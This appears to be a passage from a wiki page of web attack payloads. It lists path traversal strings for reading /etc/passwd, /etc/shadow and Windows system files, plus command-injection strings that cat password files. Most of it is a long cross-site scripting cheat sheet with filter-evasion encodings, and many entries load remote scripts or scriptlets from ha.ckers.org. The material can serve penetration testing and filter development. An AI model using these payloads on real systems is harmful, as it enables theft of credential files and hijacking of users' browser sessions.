/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Discovery Statements ===&lt;br /&gt;
&lt;br /&gt;
Discovery Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;# Discovery Statements (July 2007)&lt;br /&gt;
# Statements used to cause exploitable errors&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Common exploit code  &lt;br /&gt;
&amp;lt;pre&amp;gt;# Best Statements (July 2007)&lt;br /&gt;
# Statements covering 90% of all vulnerabilities &lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
Full List - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;# Full List (July 2007)&lt;br /&gt;
# All Statements - Full List &lt;br /&gt;
# Based on the XSS cheat sheet &lt;br /&gt;
# http://ha.ckers.org/xss.html&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
